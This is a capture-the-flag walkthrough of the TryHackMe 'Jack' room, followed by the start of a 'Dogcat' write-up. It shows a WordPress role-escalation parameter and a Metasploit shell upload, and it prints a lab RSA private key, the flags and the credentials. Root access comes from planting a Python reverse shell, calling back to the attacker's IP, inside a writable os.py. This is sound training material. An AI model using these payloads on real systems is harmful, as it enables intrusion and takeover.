[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 12 09:44:25 2023
[+] Requests Done: 785
[+] Cached Requests: 39
[+] Data Sent: 363.358 KB
[+] Data Received: 445.969 KB
[+] Memory used: 283.125 MB
[+] Elapsed time: 00:02:24

Ok we found 1 password for Wendy.

NOTE: If you are struggling with this one. You won’t find the password with rockyou. In fact I finally used another wordlist that I created based on a munge of some of the most used passwords.

Initial Web Login

Logging in I see this:

So we aren’t a full administrator here. Since we cannot access some of the pages like 404 etc, it may not be possible to upload a php reverse shell.

Checking for some exploits here. I saw a hint on the THM site about ‘ ure_other_roles’.

Escalate to Web Admin

After doing a fair bit of reading, I found that there is a plugin for WordPress referenced by the string mentioned above. I found that we can simply navigate to the profiles page, and open BurpSuite, and capture the request when we click update profile. Then, before forwarding, we just send &ure_other_roles=administrator and forward all other requests:

Now we see we have access to the other pages:

While we are here let’s change the default user role for Wendy:

Now if we have to log back in we’ll have admin. I did try this once to be sure, and I got a email verification page so I recommend you test this so your exploit won’t fail.

Initial Box Access

Now I’ll just use Meterpreter to get a reverse shell:

 kali@kalia  ~/curr  msfconsole -q
msf6 > search wp_admin_shell

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/unix/webapp/wp_admin_shell_upload  2015-02-21       excellent  Yes    WordPress Admin Shell Upload


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_admin_shell_upload

msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
                                         using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.11.62    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD changelater
PASSWORD => changelater
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS http://jack.thm/
RHOSTS => http://jack.thm/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME wendy
USERNAME => wendy
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST tun0
LHOST => 10.19.10.150
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURL /wp-admin
[!] Unknown datastore option: TARGETURL. Did you mean TARGET?
TARGETURL => /wp-admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wp-admin
TARGETURI => /wp-admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/gLvyBKxzbo/RrpHIxAzSU.php...
[*] Sending stage (39927 bytes) to 10.10.13.248
[+] Deleted RrpHIxAzSU.php
[+] Deleted gLvyBKxzbo.php
[+] Deleted ../gLvyBKxzbo
[*] Meterpreter session 1 opened (10.19.10.150:4444 -> 10.10.13.248:52428) at 2023-11-12 10:28:20 +0900


meterpreter > ls
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > cd ..
meterpreter > ls
Listing: /var/www/html/wp-content/plugins
=========================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
042775/rwxrwxr-x  4096  dir   2020-01-11 06:00:27 +0900  akismet
100664/rw-rw-r--  2255  fil   2013-05-23 06:08:40 +0900  hello.php
100664/rw-rw-r--  28    fil   2014-06-06 00:59:14 +0900  index.php
042755/rwxr-xr-x  4096  dir   2020-01-10 22:35:54 +0900  user-role-editor

meterpreter > whoami
[-] Unknown command: whoami
meterpreter > who
[-] Unknown command: who
meterpreter > w
[-] Unknown command: w
meterpreter > shell
Process 2519 created.
Channel 0 created.

python -c 'import pty; pty.spawn("/bin/bash")'
www-data@jack:/var/www/html/wp-content/plugins$ 

First Flag

Now navigate to the user home:

www-data@jack:/home/jack$ ls
ls
reminder.txt  user.txt
www-data@jack:/home/jack$ cat user.txt
cat user.txt
0052f7829e48752f2e7bf50f1231548a

Ok we got the user flag.

Let’s Enumerate for something we can use to pivot or privesc.

Let’s setup a web server with Linpeas.sh

```bash
kali@kalia  ~/curr/source  cp /home/kali/Downloads/linpeas.sh .
kali@kalia  ~/curr/source  python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …
10.10.13.248 - - [12/Nov/2023 10:35:54] "GET /linpeas.sh HTTP/1.1" 200 -

Now on the Victim:

bash
cd /dev/shm
www-data@jack:/dev/shm$ wget http://10.19.10.150/linpeas.sh
wget http://10.19.10.150/linpeas.sh
--2023-11-11 19:35:54-- http://10.19.10.150/linpeas.sh
Connecting to 10.19.10.150:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 848317 (828K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh 100%[===================>] 828.43K 417KB/s in 2.0s

2023-11-11 19:35:57 (417 KB/s) - 'linpeas.sh' saved [848317/848317]

www-data@jack:/dev/shm$ ls
ls
linpeas.sh
www-data@jack:/dev/shm$ chmod +x linpeas.sh
chmod +x linpeas.sh

First User Access

After running that we find an ssh key:

bash
╔══════════╣ Analyzing SSH Files (limit 70)

-rwxrwxrwx 1 root root 1675 Jan 10 2020 /var/backups/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxfBR9F9V5G2snv1Xaaxv3VHbFZ2VZRwGyU+ah6komBeaAldr
8SNK1x0wu/eXjLjrWnVaYOEU2YUrHzn/duB3Wvm8xyA0T8x/WbV2osWaVOafkPSv
YpV4OdQrdRoS3PEOXRnS+CnOTAgPWo2+xfH1XeldFw9XiYrprTugmwCcYDuBZB3r
zmWA8sPWjLjs6xzNK26RQQbo9zaxwfEdjZ3an9JngJJ7m0rtF9vKeCRfO1V8sd/t
1lu96Kqn4FZUTXQFEGfAYupG6b3vpRwqmI6y2VjK5MxlMmEdwP8oxmKR4XRqvSK1
8m5byz8ZUu1RfB8Ug/pKK9VVbk9QFWbrV4E3FwIDAQABAoIBAEEr0TAOu68MVUu7
yi4m8mYCb4n8apXx1mIt7YlBLvZ0vuaKdiXdIuUU3VjmOmXA9OzButIvCbhc2kfb
xrsTSPkRRRCjD9Y+VKfq0XbibOALVvpZNe3VnNIdg3l47kEEtV/+ArJmwV/TP4rn
JKrz8X/MODRBfubwb+Pzv/uJBfPAzvkokKUp9D2LqNjQEY4w71j0yUl+A0xnkT4i
L1FbzghdARExy2cJN0RfdDKhy/DfXos7+JHso3ZvXmSx0ivS+HyCblO25Kcmy4Vh
FZotNk+28iw6DKm1wrgAjj0sdLpB6jW9+M/kSQCovMijPM8h8JNPLNOJMFSKWBH8
m9US/XECgYEA+AW0bbMVoylAcWGold85Ileyuw/q3HwsDdRrO43uMZvQe8f5TRsd
Q9SvAEz9T46YErySq33jOPmsGLf02EEiyGggpBiuhi3FmtMa7440qGFig4Q5IVxn
QuSDUQvxN/uVE+TZxlRPTUeAFPcAI4DAUYbubAcJzvXeAsCPsKbQGw0CgYEAzE42
H8SUWiCMXBMotEUpn14pGcP4O+hei9j7P1Nupy/F63UtYPvXN4oi75YeLiInUXzU
S/r3+AxoNafMAy67oQhLKHXs+NOP5aEkVhNDhHFNpWutYPn9aLWUIx1tXbWsaecE
i7OCxjp0L5lDRVl3TLzXeZmtp0oSAPKNRYmgQbMCgYAvL0aoKA3RwKNV7rJX8OO5
uN1z4Q9ZavYmm2bbKaFLJs1+/whatvHWWbwBXqRCYmpkBiQRJB36VOV8vmKCUcIA
Rm8PSPLK7CJP1iGluXQjJIPNaXZE9oNeooKpBJCbie1On5ceuCNuHFAtrOAF4RS1
beol+yDOks/tzhyICvREcQKBgCHIiRClu/ZPTYZoMKHmkeRleJxnGGQnn4K2hY1K
KZEByFOQE8nmuwbXE8HUa/cq9J936c8Kl/hvbMf6kDSyhJozOeJd5aqbqT7Kb6zA
ELkU10cUUB4qGGo5JF7OHeiSAwmcBtdm/qfywIWibUpJaf3JeEQGUn3INMPtV8j4
4gQbAoGBAKuXPITKuO7SsRfXcwB3MO3iCTLdW7BYnYF1SzVbPBonmcsxlQinvoRg
2faWmSFAUK6cIys9za3pzOw3FP8W9Q5SGsA9KriSYj6/h7ei9GeJAr3mxlbGnkZN
ZFqUVe2Jvxq++O6Ub41zUtWINbR5Fxf+kTlJIIwqc6IuzZq+QWXy
-----END RSA PRIVATE KEY-----

```

Now I drop that file on my local box:

 ✘ kali@kalia  ~/curr  cat ssh/id_rsa 
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxfBR9F9V5G2snv1Xaaxv3VHbFZ2VZRwGyU+ah6komBeaAldr
8SNK1x0wu/eXjLjrWnVaYOEU2YUrHzn/duB3Wvm8xyA0T8x/WbV2osWaVOafkPSv
YpV4OdQrdRoS3PEOXRnS+CnOTAgPWo2+xfH1XeldFw9XiYrprTugmwCcYDuBZB3r
zmWA8sPWjLjs6xzNK26RQQbo9zaxwfEdjZ3an9JngJJ7m0rtF9vKeCRfO1V8sd/t
1lu96Kqn4FZUTXQFEGfAYupG6b3vpRwqmI6y2VjK5MxlMmEdwP8oxmKR4XRqvSK1
8m5byz8ZUu1RfB8Ug/pKK9VVbk9QFWbrV4E3FwIDAQABAoIBAEEr0TAOu68MVUu7
yi4m8mYCb4n8apXx1mIt7YlBLvZ0vuaKdiXdIuUU3VjmOmXA9OzButIvCbhc2kfb
xrsTSPkRRRCjD9Y+VKfq0XbibOALVvpZNe3VnNIdg3l47kEEtV/+ArJmwV/TP4rn
JKrz8X/MODRBfubwb+Pzv/uJBfPAzvkokKUp9D2LqNjQEY4w71j0yUl+A0xnkT4i
L1FbzghdARExy2cJN0RfdDKhy/DfXos7+JHso3ZvXmSx0ivS+HyCblO25Kcmy4Vh
FZotNk+28iw6DKm1wrgAjj0sdLpB6jW9+M/kSQCovMijPM8h8JNPLNOJMFSKWBH8
m9US/XECgYEA+AW0bbMVoylAcWGold85Ileyuw/q3HwsDdRrO43uMZvQe8f5TRsd
Q9SvAEz9T46YErySq33jOPmsGLf02EEiyGggpBiuhi3FmtMa7440qGFig4Q5IVxn
QuSDUQvxN/uVE+TZxlRPTUeAFPcAI4DAUYbubAcJzvXeAsCPsKbQGw0CgYEAzE42
H8SUWiCMXBMotEUpn14pGcP4O+hei9j7P1Nupy/F63UtYPvXN4oi75YeLiInUXzU
S/r3+AxoNafMAy67oQhLKHXs+NOP5aEkVhNDhHFNpWutYPn9aLWUIx1tXbWsaecE
i7OCxjp0L5lDRVl3TLzXeZmtp0oSAPKNRYmgQbMCgYAvL0aoKA3RwKNV7rJX8OO5
uN1z4Q9ZavYmm2bbKaFLJs1+/whatvHWWbwBXqRCYmpkBiQRJB36VOV8vmKCUcIA
Rm8PSPLK7CJP1iGluXQjJIPNaXZE9oNeooKpBJCbie1On5ceuCNuHFAtrOAF4RS1
beol+yDOks/tzhyICvREcQKBgCHIiRClu/ZPTYZoMKHmkeRleJxnGGQnn4K2hY1K
KZEByFOQE8nmuwbXE8HUa/cq9J936c8Kl/hvbMf6kDSyhJozOeJd5aqbqT7Kb6zA
ELkU10cUUB4qGGo5JF7OHeiSAwmcBtdm/qfywIWibUpJaf3JeEQGUn3INMPtV8j4
4gQbAoGBAKuXPITKuO7SsRfXcwB3MO3iCTLdW7BYnYF1SzVbPBonmcsxlQinvoRg
2faWmSFAUK6cIys9za3pzOw3FP8W9Q5SGsA9KriSYj6/h7ei9GeJAr3mxlbGnkZN
ZFqUVe2Jvxq++O6Ub41zUtWINbR5Fxf+kTlJIIwqc6IuzZq+QWXy
-----END RSA PRIVATE KEY-----

kali@kalia  ~/curr/ssh  chmod 0600 ssh/id_rsa

Now let’s try to use it to login and get a proper shell:

kali@kalia  ~/curr  ssh -i ssh/id_rsa jack@$IP                  
The authenticity of host '10.10.13.248 (10.10.13.248)' can't be established.
ED25519 key fingerprint is SHA256:91RPPbrI5UuL0FaDNrDEVlL+bIOB9YABCTtC3ttyW1U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.13.248' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

143 packages can be updated.
92 updates are security updates.


Last login: Mon Nov 16 14:27:49 2020 from 10.11.12.223
jack@jack:~$ 

Second Enumeration

I run Linpeas again here as I am now properly logged in as the Jack user:

╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses                                     
/home/jack/bin:/home/jack/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin


╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2                  

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

[..]

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/opt/statuscheck/output.log                                                                                                 
/var/log/auth.log
/var/log/apache2/access.log
/var/log/syslog
/home/jack/.config/lxc/client.crt
/home/jack/.config/lxc/client.key
/home/jack/.gnupg/gpg.conf
/home/jack/.gnupg/trustdb.gpg
/home/jack/.gnupg/pubring.gpg

[..]

╔══════════╣ Analyzing SSH Files (limit 70)                                                                                 

-rw------- 1 jack jack 1675 Jan 10  2020 /home/jack/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxfBR9F9V5G2snv1Xaaxv3VHbFZ2VZRwGyU+ah6komBeaAldr
8SNK1x0wu/eXjLjrWnVaYOEU2YUrHzn/duB3Wvm8xyA0T8x/WbV2osWaVOafkPSv
YpV4OdQrdRoS3PEOXRnS+CnOTAgPWo2+xfH1XeldFw9XiYrprTugmwCcYDuBZB3r
zmWA8sPWjLjs6xzNK26RQQbo9zaxwfEdjZ3an9JngJJ7m0rtF9vKeCRfO1V8sd/t
1lu96Kqn4FZUTXQFEGfAYupG6b3vpRwqmI6y2VjK5MxlMmEdwP8oxmKR4XRqvSK1
8m5byz8ZUu1RfB8Ug/pKK9VVbk9QFWbrV4E3FwIDAQABAoIBAEEr0TAOu68MVUu7
yi4m8mYCb4n8apXx1mIt7YlBLvZ0vuaKdiXdIuUU3VjmOmXA9OzButIvCbhc2kfb
xrsTSPkRRRCjD9Y+VKfq0XbibOALVvpZNe3VnNIdg3l47kEEtV/+ArJmwV/TP4rn
JKrz8X/MODRBfubwb+Pzv/uJBfPAzvkokKUp9D2LqNjQEY4w71j0yUl+A0xnkT4i
L1FbzghdARExy2cJN0RfdDKhy/DfXos7+JHso3ZvXmSx0ivS+HyCblO25Kcmy4Vh
FZotNk+28iw6DKm1wrgAjj0sdLpB6jW9+M/kSQCovMijPM8h8JNPLNOJMFSKWBH8
m9US/XECgYEA+AW0bbMVoylAcWGold85Ileyuw/q3HwsDdRrO43uMZvQe8f5TRsd
Q9SvAEz9T46YErySq33jOPmsGLf02EEiyGggpBiuhi3FmtMa7440qGFig4Q5IVxn
QuSDUQvxN/uVE+TZxlRPTUeAFPcAI4DAUYbubAcJzvXeAsCPsKbQGw0CgYEAzE42
H8SUWiCMXBMotEUpn14pGcP4O+hei9j7P1Nupy/F63UtYPvXN4oi75YeLiInUXzU
S/r3+AxoNafMAy67oQhLKHXs+NOP5aEkVhNDhHFNpWutYPn9aLWUIx1tXbWsaecE
i7OCxjp0L5lDRVl3TLzXeZmtp0oSAPKNRYmgQbMCgYAvL0aoKA3RwKNV7rJX8OO5
uN1z4Q9ZavYmm2bbKaFLJs1+/whatvHWWbwBXqRCYmpkBiQRJB36VOV8vmKCUcIA
Rm8PSPLK7CJP1iGluXQjJIPNaXZE9oNeooKpBJCbie1On5ceuCNuHFAtrOAF4RS1
beol+yDOks/tzhyICvREcQKBgCHIiRClu/ZPTYZoMKHmkeRleJxnGGQnn4K2hY1K
KZEByFOQE8nmuwbXE8HUa/cq9J936c8Kl/hvbMf6kDSyhJozOeJd5aqbqT7Kb6zA
ELkU10cUUB4qGGo5JF7OHeiSAwmcBtdm/qfywIWibUpJaf3JeEQGUn3INMPtV8j4
4gQbAoGBAKuXPITKuO7SsRfXcwB3MO3iCTLdW7BYnYF1SzVbPBonmcsxlQinvoRg
2faWmSFAUK6cIys9za3pzOw3FP8W9Q5SGsA9KriSYj6/h7ei9GeJAr3mxlbGnkZN
ZFqUVe2Jvxq++O6Ub41zUtWINbR5Fxf+kTlJIIwqc6IuzZq+QWXy
-----END RSA PRIVATE KEY-----
-rw-r--r-- 1 jack jack 391 Jan 10  2020 /home/jack/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDF8FH0X1Xkbaye/VdprG/dUdsVnZVlHAbJT5qHqSiYF5oCV2vxI0rXHTC795eMuOtadVpg4RTZhSsfOf924Hda+bzHIDRPzH9ZtXaixZpU5p+Q9K9ilXg51Ct1GhLc8Q5dGdL4Kc5MCA9ajb7F8fVd6V0XD1eJiumtO6CbAJxgO4FkHevOZYDyw9aMuOzrHM0rbpFBBuj3NrHB8R2Nndqf0meAknubSu0X28p4JF87VXyx3+3WW73oqqfgVlRNdAUQZ8Bi6kbpve+lHCqYjrLZWMrkzGUyYR3A/yjGYpHhdGq9IrXyblvLPxlS7VF8HxSD+kor1VVuT1AVZutXgTcX jack@jack
-rwxrwxrwx 1 root root 1675 Jan 10  2020 /var/backups/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxfBR9F9V5G2snv1Xaaxv3VHbFZ2VZRwGyU+ah6komBeaAldr
8SNK1x0wu/eXjLjrWnVaYOEU2YUrHzn/duB3Wvm8xyA0T8x/WbV2osWaVOafkPSv
YpV4OdQrdRoS3PEOXRnS+CnOTAgPWo2+xfH1XeldFw9XiYrprTugmwCcYDuBZB3r
zmWA8sPWjLjs6xzNK26RQQbo9zaxwfEdjZ3an9JngJJ7m0rtF9vKeCRfO1V8sd/t
1lu96Kqn4FZUTXQFEGfAYupG6b3vpRwqmI6y2VjK5MxlMmEdwP8oxmKR4XRqvSK1
8m5byz8ZUu1RfB8Ug/pKK9VVbk9QFWbrV4E3FwIDAQABAoIBAEEr0TAOu68MVUu7
yi4m8mYCb4n8apXx1mIt7YlBLvZ0vuaKdiXdIuUU3VjmOmXA9OzButIvCbhc2kfb
xrsTSPkRRRCjD9Y+VKfq0XbibOALVvpZNe3VnNIdg3l47kEEtV/+ArJmwV/TP4rn
JKrz8X/MODRBfubwb+Pzv/uJBfPAzvkokKUp9D2LqNjQEY4w71j0yUl+A0xnkT4i
L1FbzghdARExy2cJN0RfdDKhy/DfXos7+JHso3ZvXmSx0ivS+HyCblO25Kcmy4Vh
FZotNk+28iw6DKm1wrgAjj0sdLpB6jW9+M/kSQCovMijPM8h8JNPLNOJMFSKWBH8
m9US/XECgYEA+AW0bbMVoylAcWGold85Ileyuw/q3HwsDdRrO43uMZvQe8f5TRsd
Q9SvAEz9T46YErySq33jOPmsGLf02EEiyGggpBiuhi3FmtMa7440qGFig4Q5IVxn
QuSDUQvxN/uVE+TZxlRPTUeAFPcAI4DAUYbubAcJzvXeAsCPsKbQGw0CgYEAzE42
H8SUWiCMXBMotEUpn14pGcP4O+hei9j7P1Nupy/F63UtYPvXN4oi75YeLiInUXzU
S/r3+AxoNafMAy67oQhLKHXs+NOP5aEkVhNDhHFNpWutYPn9aLWUIx1tXbWsaecE
i7OCxjp0L5lDRVl3TLzXeZmtp0oSAPKNRYmgQbMCgYAvL0aoKA3RwKNV7rJX8OO5
uN1z4Q9ZavYmm2bbKaFLJs1+/whatvHWWbwBXqRCYmpkBiQRJB36VOV8vmKCUcIA
Rm8PSPLK7CJP1iGluXQjJIPNaXZE9oNeooKpBJCbie1On5ceuCNuHFAtrOAF4RS1
beol+yDOks/tzhyICvREcQKBgCHIiRClu/ZPTYZoMKHmkeRleJxnGGQnn4K2hY1K
KZEByFOQE8nmuwbXE8HUa/cq9J936c8Kl/hvbMf6kDSyhJozOeJd5aqbqT7Kb6zA
ELkU10cUUB4qGGo5JF7OHeiSAwmcBtdm/qfywIWibUpJaf3JeEQGUn3INMPtV8j4
4gQbAoGBAKuXPITKuO7SsRfXcwB3MO3iCTLdW7BYnYF1SzVbPBonmcsxlQinvoRg
2faWmSFAUK6cIys9za3pzOw3FP8W9Q5SGsA9KriSYj6/h7ei9GeJAr3mxlbGnkZN
ZFqUVe2Jvxq++O6Ub41zUtWINbR5Fxf+kTlJIIwqc6IuzZq+QWXy
-----END RSA PRIVATE KEY-----



-rw-rw-r-- 1 jack jack 391 Jan 10  2020 /home/jack/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDF8FH0X1Xkbaye/VdprG/dUdsVnZVlHAbJT5qHqSiYF5oCV2vxI0rXHTC795eMuOtadVpg4RTZhSsfOf924Hda+bzHIDRPzH9ZtXaixZpU5p+Q9K9ilXg51Ct1GhLc8Q5dGdL4Kc5MCA9ajb7F8fVd6V0XD1eJiumtO6CbAJxgO4FkHevOZYDyw9aMuOzrHM0rbpFBBuj3NrHB8R2Nndqf0meAknubSu0X28p4JF87VXyx3+3WW73oqqfgVlRNdAUQZ8Bi6kbpve+lHCqYjrLZWMrkzGUyYR3A/yjGYpHhdGq9IrXyblvLPxlS7VF8HxSD+kor1VVuT1AVZutXgTcX jack@jack

Now tried to login as both jack and root on both those SSH keys. Root requires password so I wasn’t able to use that. Jack can login on either key without a password.

Checking out his home directory I saw 1 other interesting file:

jack@jack:~$ cat reminder.txt 

Please read the memo on linux file permissions, last time your backups almost got us hacked! Jack will hear about this when he gets back.

Ok.. so I seem to be getting pointed to backups again.

I want to check out the interesting files modified in the last 5 mins. This one looks very interesting:

/opt/statuscheck/output.log

Hmm this room said hack python to gain root. I’d say this is our most likely vector:

jack@jack:~$ cd /opt/statuscheck/
jack@jack:/opt/statuscheck$ ls
checker.py  output.log
jack@jack:/opt/statuscheck$ cat output.log 

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:44:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:46:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8
[..]

So that python script runs once a min. I think we can exploit that somehow since Root is running it.

Checking out that /var/backups directory:

www-data@jack:/dev/shm$ ls -al /var/backups
ls -al /var/backups
total 776
drwxr-xr-x  2 root root     4096 Jan 10  2020 .
drwxr-xr-x 14 root root     4096 Jan  9  2020 ..
-rw-r--r--  1 root root    40960 Jan  9  2020 alternatives.tar.0
-rw-r--r--  1 root root     9931 Jan  9  2020 apt.extended_states.0
-rw-r--r--  1 root root      713 Jan  8  2020 apt.extended_states.1.gz
-rw-r--r--  1 root root       11 Jan  8  2020 dpkg.arch.0
-rw-r--r--  1 root root       43 Jan  8  2020 dpkg.arch.1.gz
-rw-r--r--  1 root root      437 Jan  8  2020 dpkg.diversions.0
-rw-r--r--  1 root root      202 Jan  8  2020 dpkg.diversions.1.gz
-rw-r--r--  1 root root      207 Jan  9  2020 dpkg.statoverride.0
-rw-r--r--  1 root root      129 Jan  8  2020 dpkg.statoverride.1.gz
-rw-r--r--  1 root root   552673 Jan  9  2020 dpkg.status.0
-rw-r--r--  1 root root   129487 Jan  8  2020 dpkg.status.1.gz
-rw-------  1 root root      802 Jan  9  2020 group.bak
-rw-------  1 root shadow    672 Jan  9  2020 gshadow.bak
-rwxrwxrwx  1 root root     1675 Jan 10  2020 id_rsa
-rw-------  1 root root     1626 Jan  9  2020 passwd.bak
-rw-------  1 root shadow    969 Jan  9  2020 shadow.bak

Important passwd and shadow but it’s only root access. Also the id_rsa that Linpeas found previously.

It seems like we can write to a lot of stuff based on the output of Linpeas. I want to check what groups we are part of:

jack@jack:/opt/statuscheck$ groups
jack adm cdrom dip plugdev lpadmin sambashare family

Now what does that family group give us access to write/read. It seems to be the only real interesting one as the others are common groups:

jack@jack:/opt/statuscheck$ find / -group family 2>/dev/null
/usr/lib/python2.7/_threading_local.py
/usr/lib/python2.7/plistlib.pyc
/usr/lib/python2.7/stringprep.py
/usr/lib/python2.7/ihooks.pyc
/usr/lib/python2.7/weakref.py
/usr/lib/python2.7/sgmllib.pyc
[.. 200 more..]

/usr/lib/python2.7/os.py
/usr/lib/python2.7/posixpath.py
/usr/lib/python2.7/io.pyc
/usr/lib/python2.7/traceback.pyc
/usr/lib/python2.7/asyncore.py
/usr/lib/python2.7/popen2.py
/usr/lib/python2.7/zipfile.pyc
/usr/lib/python2.7/doctest.pyc
/usr/lib/python2.7/getpass.pyc
/usr/lib/python2.7/smtplib.py
/etc/python2.7/sitecustomize.py

Wow.. not good. We can actually write to ALL of these python modules. The room title makes sense now. All too easy.

PrivEsc

Ok let’s grab a Python reverse shell:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

And I use this one:

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.19.10.150",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

I put that in the bottom of the os.py file:

try:
    _copy_reg.pickle(statvfs_result, _pickle_statvfs_result,
                     _make_statvfs_result)
except NameError: # statvfs_result may not exist
    pass

# -- My treacherous additions mohaha
import socket,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.19.10.150",4444))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/sh")

I modified it to not import os since we already import it above. Also removed the os. from the dup2 refs since it’s not needed, and of course split it up to make it look readable, and finally put my own IP and port for the callback.

Next start a listener and wait:

✘ kali@kalia  ~  ~/bin/revs 4444
Starting reverse shell on port 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z - Background shell
stty raw -echo; fg
export TERM=xterm
listening on [any] 4444 ...
connect to [10.19.10.150] from (UNKNOWN) [10.10.13.248] 52586
# whoami
whoami
root
# 

NOTE: If you have trouble, you can just run python with no options as jack and it will fail citing the error and line number in the os.py file 🙂 You’re welcome. It will connect as jack once your test succeeds. Just kill that since we want root to connect back to us.

Once you get it fixed, restart your reverse listener and wait for the root shell to connect to you.

Last Flag

# whoami
whoami
root
# ls
ls
root.txt
# cat root.txt
cat root.txt
b8b63a861cc09e853f29d8055d64bffb
# 

Anyway there we have it, we have our root shell and can get the flag.

Usernames:

jack              #wp user
wendy:changelater #wp user
danny             #wp user

Conclusion

This was a really fun room. Not your standard WordPress hack. I actually had to go through a few user lists which a I thought was lame. NOTE to CTF creators: You don’t make a room harder by making the password further down a userlist or just adding the password to something obscure. I went through the entire rockyou.txt and then tried some other ones I’ve created in the past for most common and that’s how I found wendy’s password. If anyone tries to use Rockyou.txt, don’t bother, the password isn’t there.

The rest of the room was textbook – though a little more hard than just Linpeas, gtfobins and done. It was still easy.

Initial Difficulty: 5/10
Overall Difficulty: 5/10
Fun Level: 8/10

Dogcat

Initial Enumeration

This is another fun room I found on Tryhackme. I have more time on the weekends to gear up for my OSCP exam so anything Medium, Hard, Insane I do on the weekends. Here we can exploit a PHP application via LFI and break out of a docker container.

This looks like an easy box. LFI’s are typically easy to find and exploit.

Let’s go with a rust scan:


.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
